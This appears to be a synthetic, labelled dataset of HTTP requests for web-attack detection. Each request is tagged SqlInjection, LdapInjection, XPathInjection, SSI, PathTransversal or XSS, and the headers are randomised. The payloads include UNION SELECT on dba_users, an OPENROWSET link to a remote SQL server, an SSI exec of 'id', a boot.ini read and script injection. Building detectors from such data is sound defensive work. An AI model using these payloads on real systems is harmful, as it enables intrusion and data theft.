Via: FTP/3.5 213.230.49.85:374, 1.1 www.ded7.js:37
Transfer-Encoding: gzip
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ieisliaDeoir=tyo5vionA&o6eslsgunLayz=ahood&u4mnv9s1e=nrpeciHcr&3dcttenA=996&ir1td=o8&shNrdtt=wTM-mtsfIwWc&SHV_5pph_X=nsub&lc5eei=4738

End - Id: 48225
Start - Id: 37150
class: LdapInjection
GET /e.NBrXHQk/nt6LFPbhhkknRb.asp?krioonret=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&c9eywdv=m.GS2 HTTP/1.1
Host: 89.135.228.92
Connection: keep-alive
Accept: text/xml;q=0.8, text/xml;q=0.8, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=37859
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Mon, 18 Jan 10 11:19:53 GMT
ETag: "fJDFWgf-jr4hocD.lbId"
Expect: mawdi
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 09 Nov 05 04:40:05 CET
If-Unmodified-Since: Thu, 19 Feb 09 12:58:52 UTC
If-Match: *
If-None-Match: "Ug.9DWRyEQLn@jFnZka"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.7
Pragma: oiiak='oeuithoe'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: rTre reoyn=d9imh
Range: 88347-,9-
Referer: /tdn7iqOe/ttst9ore/lpnoesoh.pl
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (compatible; MSIE 8.1; Open BSD i586; d16wet; i9tonten; Reltumnd)
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: FTP/6.7 231.57.240.134, 6.8 143.95.90.197
Transfer-Encoding: identity
Upgrade: hzs/8.1, Sct/5.2, 1jwo4/3.2, u0ie/8.6, lheiu/9.7
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 88222517612
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37150
Start - Id: 42541
class: SqlInjection
GET /vyh0ZR3BM/tctxEs853/eE@b0ITiveZC@pYEVeFV/19k0otPrnXbRFE4rrIr/uiThnessz/e9o8ono1X0xL.mdb?adla4c=OR+++++%27c9eprX%27++++LIKE++++%27Sim%25%27&cwyg=hDcnCdf&gSBz1=EN&52QCaI.LadminkQn=%3Asy%3Ct&telnetnph-autoexecnc=163497&BBmfbOf81k=nOgPa4bsrE&v4etcoA@wY=61353795&ceaddlm2wp=eiExaong5Zuynf&SjVYPNvRBi5n=mrasc3jawa&O1Qa=dboot.iniaRl&N18wKhusrKb=tec+autoexecchavingd&uIosmoiare3n=auPdE&UOfk1Fj=08766856 HTTP/1.0
Host: www.fBDowudss.it
Connection: esm7r
Accept: application/zip;q=0.5, text/xml;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-tre5a;q=0.1, oeP-eDaee1u;q=0.3
Cache-Control: max-age=6227
Client-ip: 144.73.242.147
Cookie: bwQssyerhhh=2866
Cookie2: $Version="1"
Date: Wed, 03 Jun 09 20:51:21 UTC
ETag: "R_27@H9wdTqDRe2"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Sun, 13 Sep 09 09:57:18 UTC
If-Unmodified-Since: Wed, 05 Jan 05 20:27:53 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 196
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: NTLM b0ExbHI1Y3RnZjdpb0lhaWRwQXU1c2FsZG90dHNqdXRjcw==
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 79786-446
Referer: /Onatta/tdeat2n/nah2/04eunhie/aFonnER.swf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: fnCQhd http://www.Me4ai.it
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: si2s/3.6 94.215.143.145:721
Transfer-Encoding: identity
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 563 www.aePi5.gif "edicbUoeitewfnmtlui" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42541
Start - Id: 48992
class: XPathInjection
GET /ooet8ahehfstwGae/c6JOKf@EVVWaBB1D.exe?brs1ehwiai2=61++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++817%3D HTTP/1.1
Host: 12.251.252.105
Connection: close
Accept: audio/basic, video/*;q=0.8, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: nww-2OauH
Cache-Control: only-if-cached
Client-ip: 102.111.118.138
Cookie: elebeH65c=thft02ddlamseoyhlh;8sOmao9eouker=14485
Cookie2: $Version="778"
Date: Thu, 18 Mar 04 13:53:56 CET
ETag: "L18TtWv_HO4fi5oihf"
Expect: 100-continue
From: rdd7Hew6@nxilnib.gov
If-Modified-Since: Sun, 29 Aug 04 08:59:11 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: "@Nh1hr_NcB5bnxI@"
If-None-Match: *
If-Range: *
Max-Forwards: 6230
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest uri=/mefO/Ntfnyx/hohsk/lqzwhtli.sh
Range: 23-,057-,45-
Referer: /tsptaa/ar3na/dmfsdotg/bmrbi.swf
TE: trailers,gzip,gzip
Trailer: From
User-Agent: 6meaaauc4er
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: HTTP/8.6 www.nric.html
Transfer-Encoding: compress
Upgrade: ttdCe/0.8, oa8sie/8.1, wteoa/2.2, Lsat/9.3
Warning: 728 157.50.122.194 "mlteR2oivlsnuennt" "Wed, 05 Jan 05 24:55:15 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48992
Start - Id: 41416
class: SqlInjection
POST /lHnqI0n16Y7B2pOb/1rlyZeCRJth/n3lnde/oltusE/RO2uhTdnggtAianrt/jlIWY/luoWntjlsyJbsnc/sQt/9n/-JLvbscriptPh.6Eu/erfwuepodhs.sh? HTTP/1.1
Content-Length: 160
Content-Language: e2ettx
Content-Encoding: compress
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: aWRlaXVvcm0wMjFlc3IyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Nov 04 11:23:00 GMT
Last-Modified: Sun, 17 Aug 08 06:39:27 UTC
Host: 114.221.134.103
Connection: keep-alive
Accept: text/xml, video/*;q=0.9
Accept-Charset: x-mac-turkish, windows-1258;q=0.8, iso-2022-kr, euc-kr
Accept-Encoding: 
Accept-Language: iaaa-esr4xh;q=0.4, DtnqrIt-e;q=0.9, 5gt-si;q=0.9, sqr-s5so;q=0.6, u57rd82e-maTeqn
Cache-Control: no-cache
Client-ip: 180.8.150.200
Cookie: rm9djuteoeatt=nAnr3xc;iih65rwyttTy=7ttrr|;ewgr=79873673;utmoimixr6dC6ts=r 3x;gtrSlyg=axvJH;idEa7Ia5dsaek=1830638
Cookie2: $Version="20"
Date: Fri, 20 Oct 06 13:05:22 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: oghl
From: eznB@Adtctleba.uk
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Tue, 11 Mar 08 05:24:51 GMT
If-Match: "FTba.-n9fS1b70R"
If-None-Match: *
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 34
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM Z3RxbHNpYWhvU2FhZTFubEVuem1SMW5tdHRPb2VFZm9zdHRldXJlZmFFb2x0YWY=
Range: 4509-,62-022408,-4198
Referer: http://ssoehf.be/3ndk0/enmt.rar
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (X11; U; Solaris 5.7; Gc-co; rv:9.6.3) Gecko/34902156
UA-CPU: MIPS
UA-Disp: 016,9117,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 738x118
Via: 1.4 www.thuScr.css:9, 9.7 0.189.119.128
Transfer-Encoding: identity
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 19164
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Iasuuaertgk='    or     id   in   (    select * from   user_db   )&9eeer=dht-ej hs&tws=349&drksajnc=isnqdI&&tsMrt5ofej=uHhe&m3ulmehclegeifl=yAPc6HhtHFLU

End - Id: 41416
Start - Id: 38729
class: LdapInjection
GET /ngssrs54ra/irlee2ihin5n/gCNWOKU8o6R/sefs2hhe6aIetolerhSt/sC4tyr3doQPbeZS_DV/vyeRrYwdNfPTS3/bseeoaf2eiwoef/Kv_sTV.png?ync5=27553&slrcstOnats7tn=5339&aousstr=3527&DSn5=8&BubinZmeta5hqxWexec=inph-su&qhbFkU7=odrd%29%28+++%7C+++%28ytia%3D*%29&trnEedi1ttos=3ZJcsHlo1&tefdabbara=7rfhTZf&oetnwesrretkn=hnLgnsse&Er1ydn=oMdEzG&teniipn9hdhwbse=UjitsolasdddbTsrz&sszoz2bhsnoA=%25o2t%3Bnpadmin+s&d0=asexeci&eyautraanBnNbOa=xam&lr=94 HTTP/1.0
Host: 128.210.77.209:3648
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: edauaTg-Aew;q=0.4, i-aAacnTmw, icrtsi-pooe;q=0.9, un-tusguaeL;q=0.3, aeh-ssfo3oed;q=0.8
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: 4a7n=oenneaAnhNi ;2hyrc=idseeztir0Hwzo7n2;c8Xsm=s-gb613ALsPE;swvc4fepeR=826927731
Cookie2: $Version="15"
Date: Thu, 21 Jul 05 08:37:53 CET
ETag: "QB_Ra65Zn9G0M2Xodqta"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: "a8BfFov.wQgNTYi25UOM"
If-Range: Fri, 21 Nov 08 21:04:47 UTC
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: NTLM dGNucnJ1NG5scmkzZG5uSGF0bnRldHJBbzh6ZFJkc3llYm1lZXQydw==
Range: 19961-033465,471515-
Referer: http://www.wwsr.ch/rT7Erye.exe
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: snuw8smuo (ehjLos; a9PI-gBO; dLocGo-)
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: identity
Upgrade: u3thye/4.0, rfee/2.0
Warning: 710 168.112.195.187 "tiseidiPedr0p" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38729
Start - Id: 35258
class: SqlInjection
GET /jfDJxIyE1z0W/3oWszAiuHublua7/unJBF.WxKDvRwkgvwd/t5TcJwvXS9VetX_.tiff?tvTEht=tSi&uIj4q=fiasdo&apliAf=464434&shlgprolmDrw=fwfbeot0zaes7kt&9upsnfBcFtnuwg=chairs%27++UN%2F**%2FION+SEL%2F**%2FECT+rpeco1Lw+FROM+++++dba_users+WHERE+++++sr+++like+++++%27%2525&gt9mat=inlZyomqrsotamt&pae8=9291280675 HTTP/1.1
Host: 27.233.244.40
Connection: close
Accept: text/*, image/*, video/*
Accept-Charset: *
Accept-Encoding: compress, compress
Accept-Language: d-adnao;q=0.8, he7eh-t4iU;q=0.5, a6ieiani-scc, boduelr-mNr, g-htr
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="4"
Date: Thu, 25 May 06 04:56:26 CET
ETag: W/"NBtBFUHwyb@U6oz"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Mon, 26 Jun 06 06:10:40 GMT
If-Unmodified-Since: Mon, 26 Oct 09 18:15:16 CET
If-Match: *
If-None-Match: "b5Iin6Q.3RF3p.tS1"
If-Range: Sun, 29 Jun 08 15:57:08 CET
Max-Forwards: 0272
MIME-Version: 2.3
Pragma: pHeo=soisHll
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: sdteoe 7etvnrw=eha2
Range: 716-,83323-
Referer: http://www.otqe.cz/n8aeeo/uonackt/slcgrr.txt
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/9.7 (X11; U; SunOS sun4u 3.3; ee-es; rv:9.3.9) Gecko/27079267
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: wage9l/2.5 3.65.189.140, HTTP/8.9 www.iiaehtia.js, HTTP/0.7 180.7.214.179
Transfer-Encoding: deflate
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35258
Start - Id: 40802
class: SSI
GET /tiaiPEmnT60ietfiwtf/Rechoftp/eM_56T/oeehstha3s/ie.u/rthaehSX2ose.htm?zseE=aiit+childhcoef&nene6i=0487898&tedrow4Acn=%3C%21--++++%23odbc+statement++%3D++++%22select+++1znyeyxo%2C++++tlkrs%2C+++0ed++from+++++eemdou3+++++order++by+++8%2C+219%2C++++6%22+--%3E&aactC=475&0-PoPRmS__=71&yPtientrd=7242 HTTP/1.1
Host: www.donml.st
Connection: giepic
Accept: image/*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.4, gzip;q=0.4
Accept-Language: *;q=0.2
Cache-Control: egdatd='uemso'
Client-ip: 183.101.183.29
Cookie: iiemy=y
Cookie2: $Version="6"
Date: Wed, 29 Sep 04 01:07:41 UTC
ETag: W/"VVcj4Ggote7jxo7"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Tue, 14 Aug 07 02:52:59 UTC
If-Unmodified-Since: Tue, 28 Jun 05 02:36:33 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: Sun, 15 Jun 08 24:05:38 GMT
Max-Forwards: 8
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest username="easT"
Authorization: Digest response="9F42047561F5AaD360880AC7E2cE3148"
Range: 89010-,593978-8589,-17027
Referer: http://daihe.uk/destdt.swf
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.5 (X11; U; Open BSD i586 2.6; pj-Nn; rv:9.1.3) Gecko/16129687
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: FTP/5.9 58.191.224.182
Transfer-Encoding: compress
Upgrade: f6i/6.1
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40802
Start - Id: 41491
class: SqlInjection
PUT /gIsn7ttehh/rve453bl5ueU.mspx? HTTP/1.1
Content-Length: 493
Content-Language: onOc,ii
Content-Encoding: compress
Content-Location: http://www.erinh6y.st/40weszw/8sDlrs/sihRacoc/irrMsnR.php4
Content-MD5: YVI5dHROOWg1RWlzY3NvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 14:48:02 GMT
Last-Modified: Sat, 14 Mar 09 21:15:08 GMT
Host: 156.95.237.2
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: diDjaEeo-o, etane-Rodh, zFetzeta-ain;q=0.3, smt-rE;q=0.0, k1hir-rr9ete4;q=0.6
Cache-Control: no-transform
Client-ip: 166.168.236.80
Cookie: gotDilo=ea'+Mi+i;g1teserDmPE7t=16330632
Cookie2: $Version="965"
Date: Fri, 22 Dec 06 15:45:45 UTC
ETag: W/"yb6XrfzwffC.Ke8rnPCg"
Expect: rty1n7=s0jaueru
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Sat, 08 Mar 08 14:51:08 CET
If-Unmodified-Since: Wed, 30 Nov 05 24:34:15 CET
If-Match: "KSbB8s_2Gt2VQgycS"
If-None-Match: "M510Q-6cxIeb7POqq"
If-Range: *
Max-Forwards: 697
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: /oivOtia9/tnsK.mpg
TE: trailers
Trailer: Accept-Encoding
User-Agent: mE7h9ha (i4jw6y0; aCZfKAPbsQ; iuKoEXeSM_; a0sN-jmO-; irFINsxcId)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 6.0 186.5.57.15
Transfer-Encoding: deflate
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0moitompdaeoiy=;   insert     into OPENROWSET(    'SQLoledb','uid=eecNwnht;pwd=Ssa0e;Network=DBMSSOCN;Address=95.228.231.237,1433;','select   * from _sysdatabases'   );  select     *    from     LinkedOrRemoteSrv1.master.dbo.sysdatabases&prPu=tWJ&Eriershid0ude=a19rh&c0XGM-uQ=tnGapaxuhf&selxiwk=uS31gEnbY8h&Sbt=9461&asEm=mlstw&ydiSf=7261&shutdown@9adminndrchildq4g=2&naesPpusie=uft4&_5y@=uigipeisnOrfn&tAhtjgiJlfilHH=rmjln50Kyd-K&airnNemdremr3wt=lDt6r

End - Id: 41491
Start - Id: 49784
class: XPathInjection
GET /urhpnhca6/oPRJMemOJ5zWV/lhii0e/imebdterpr/b4eR/ooL@PsPIinRro9FD/nuVEn431/d_zH6/nQ-7kuT@7/wr7by4nfadoEb/7o.aspx?ineuTbu5=asani%27+++++or+++++1%3C+ietmoe%2Fomt%2Fqm%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D271%5D++or++++%27Ac8e%27++++%3D++++%27&ae0as6tw=eIvzoE&vSefaoe6=+eo6&5nd6iUeeot8wed=zbULWX4xR5&abbeeajto=7214549 HTTP/1.1
Host: 63.166.84.69:44
Connection: keep-alive
Accept: video/quicktime, video/mpeg
Accept-Charset: us-ascii, iso-2022-jp;q=0.1, windows-1257
Accept-Encoding: identity
Accept-Language: wosrEal-rah
Cache-Control: PoouiSr=c6a
Client-ip: 197.120.23.169
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="658"
Date: Tue, 27 May 08 17:43:56 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: 0o1be@Sjeha.org
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Wed, 04 Jul 07 02:52:33 CET
If-Match: "_VP_7BE4-Cxg7UlMqj"
If-None-Match: "BGEzR4kHxactQoU"
If-Range: Thu, 03 Jul 08 18:46:11 UTC
Max-Forwards: 2367
MIME-Version: 6.9
Pragma: 8crs='cotr8xoe'
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: 800674-0,376-429,12-
Referer: http://www.hynL6.fr/oeiNnae.php4
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.4 (X11; U; Solaris 5.6; u1-la; rv:6.4.0) Gecko/65381513
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: HTTP/0.5 29.73.110.139, 2.6 www.dufhR.js, 9.3 219.39.6.218
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49784
Start - Id: 35970
class: PathTransversal
GET /nQ7Nf/glssabsr7eof3oo4m/tHk2-5LR/7HzA/ee9o6od7dohyiuAbtio/bsanar4dma6mnm0beoe/ize/c.72g1y1tMebO.gif?Se=iiot&vcsnes=cghtacces&Y17=aV62fSFnFP&kOAnae=82KtzBKM&rAgpms=8328963424&lanywoVjDn=eT_&Oo=614956562&xrwnosakace8e0=6opt-rovar%263&sock_streamA33oLGfX=te&3Zgwgetvupdate10=wtisnioaaT8&WOp.Mwc=a%2Fopen+passthrumisock_streamm0+&b5e4=dteeNctgmsa&htoa99eOduOte=5&miii=sock_streameh HTTP/1.1
Host: www.nteTb.be:3
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1255;q=0.0, utf-7
Accept-Encoding: identity, gzip;q=0.6, deflate;q=0.8, compress
Accept-Language: *;q=0.0
Cache-Control: dU='udkl'
Client-ip: 13.45.88.198
Cookie: towr319Yfoh=tttdpttitjnstth;kaDtfd4yoeent=e6ncQ@PJTz;iia=i:\windows\boot.ini;lvSe=mscripte;gunls7dbyd=o8qxu6V0m
Cookie2: $Version="784"
Date: Mon, 04 Jan 10 13:13:27 UTC
ETag: W/".z-2@ZfLD8wfVD2R5."
If-Modified-Since: Thu, 27 Jan 05 02:31:01 GMT
If-Unmodified-Since: Thu, 22 Feb 07 04:27:37 UTC
If-None-Match: *
If-Range: Sat, 15 Dec 07 06:01:15 UTC
Max-Forwards: 19
MIME-Version: 8.5
Authorization: hvzeit eisc6ow=AMia
Referer: /edalflh/kFne.tar
TE: chunked
Trailer: Accept
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 2.7; or-oi; rv:2.8.0) Gecko/27747495
UA-OS: Win9x
Via: een8/2.1 224.72.116.115
----: ---------------------------

null

End - Id: 35970
Start - Id: 39976
class: SSI
GET /VxX/ERRt7/ilrj7paAIi/ZsSUGoY@-ncWRX/mepxlnJcMu2y1/jgd.aspx?etedeuE=goeiie5ocNri3&liSt8Sthltid=%3C%21+%23%3C%21--+++%23exec++cmd%3D%22id%22--%3E HTTP/1.0
Host: www.resant.fr:62116
Connection: 1gicuaaf
Accept: */*;q=0.0
Accept-Charset: iso-8859-6
Accept-Encoding: 
Accept-Language: AMniae-wpiTSr;q=0.0, netaSd-uy6eq;q=0.3, erse6eac-eci
Cache-Control: max-stale
Client-ip: 160.248.173.144
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="03"
Date: Mon, 22 Jun 09 16:57:44 CET
ETag: "syLbFXo8hSf7y.nXN"
Expect: a3hy
From: geep3@ewvRfcmr4A.be
If-Modified-Since: Fri, 18 Sep 09 03:37:33 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: *
If-None-Match: "K0tdW4yv_K7@OCCTKU"
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 3769
MIME-Version: 9.7
Pragma: 0e='tM'
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Digest nonce
Range: 75-
Referer: http://ermnaer.org/SooEp.css
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: inRTeec/4.5.5.4.2
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color16
Via: 6.5 www.amnu.jpeg, nccl/7.6 www.nchd.png
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39976
Start - Id: 47835
class: XSS
GET /mk_UNN.nu9A/f%uhomeagw/hgst8sqswn9/45temvest2ncdsdH/ertreC7fh/AE7VURSRz/n8l9@3H55/xOI_uj5bYWPRSc/a8s/N7kr2nt/@CGIZ/eU5.sh?sE3eeiaStrpsueR=%3Cobject+++classid+++%3D++%22clsid%3A...+++++%22+++++codebase++++%3D++%22+++javascript%3A+%5Balert++++%28%27cn%27%29%3B%5D+++%22++%3E&OperlBJj1Wf1=due&rcon=q-3Y9Fy7l&ilkta=y%25s%5Be&fonpcmIthlu3cp=095&weoserSI=%3Eo&toodslobn2=5%3Daea5srnsih&aiT6eoeeafp=an2all&RpaMu=afea&donx8lwime=eati&ttttut1=dada HTTP/1.1
Host: 70.236.124.201
Connection: keep-alive
Accept: audio/basic, audio/basic, text/xml
Accept-Charset: iso-8859-4, windows-1253
Accept-Encoding: gzip, identity, identity;q=0.4, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 145.49.48.15
Cookie: 0n=1148209;lTamntl3dt=tPptL1vD;cgEenhdde7o35u=nute9Aul;Thknecgt=1933
Cookie2: $Version="626"
Date: Mon, 29 Aug 05 12:57:53 GMT
Expect: ouzt
If-Modified-Since: Fri, 10 Mar 06 11:22:11 GMT
If-Unmodified-Since: Mon, 19 Apr 04 13:39:31 GMT
If-None-Match: *
Max-Forwards: 4722
Pragma: 526w=sic
Proxy-Authorization: NTLM TDNybjkwYkRubGFlcWlucmU0c2F0ZWNudmd1dHVvbnNzQ1dtenNoZDNtc2U=
Authorization: sb51Ce rd2eo=uobarn
Referer: http://www.mjov3.net/eWida/oanx/ehnE/yclW4/xftg.mdb
TE: chunked
User-Agent: Mozilla/5.1 (X11; U; Open BSD i586 2.0; ml-Tj; rv:9.6.8) Gecko/87753867
Via: Edun/6.1 www.o40gondl.js:139, 3.1 www.TgTh.css
Transfer-Encoding: identity
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"

null

End - Id: 47835
Start - Id: 46742
class: XSS
GET /tVwJHYxW7T5ess/eG1q@kebEuN.9IjPqr7/Yw4yEJ..msf?rprgfwne3seov4=361415&Scat=22332&rAwt=aKP&gOe=046&hunmtane=aSe4+h+d+%28 HTTP/1.1
Host: www.Peaytebore.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress, gzip;q=0.3, gzip;q=0.2, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 187.192.160.132
Cookie: nNa56xafirs1ha=pnjsa   "   style=left:expression(alert    ("    iftxr.eaot  ")) alt= ";qa=63939;t252nl=l'@positionN;9ris5d=e;_PtEXQ=aof
Cookie2: $Version="780"
Date: Thu, 27 Dec 07 02:16:36 GMT
ETag: "87a1HKJDuH2T4ak3F"
Expect: 100-continue
From: vpiisea@ttsPnero.gov
If-Modified-Since: Fri, 14 May 04 09:24:32 CET
If-Unmodified-Since: Mon, 04 Oct 04 22:25:32 CET
If-Match: *
If-None-Match: "Bt@N5CqA5RuBBaaGUU0"
If-Range: Wed, 28 Apr 04 19:09:37 GMT
Max-Forwards: 8
Pragma: eahfr=dEIithle
Proxy-Authorization: ehdls lqmtt=7Lihahj
Authorization: Basic blRlc2g6bGRpdGE=
Range: 50922-39,75-,00-
Referer: /otsMswnc.dll
TE: chunked,trailers
Trailer: Range
User-Agent: nmeo (oHM7y4J; ek2fyrGJ; afxcNzQR)
UA-CPU: x86
UA-Disp: 2238,7831,8
UA-OS: Win98
UA-Pixels: 554x016
Via: 1.4 132.237.121.164
Transfer-Encoding: gzip
Upgrade: acef/9.1
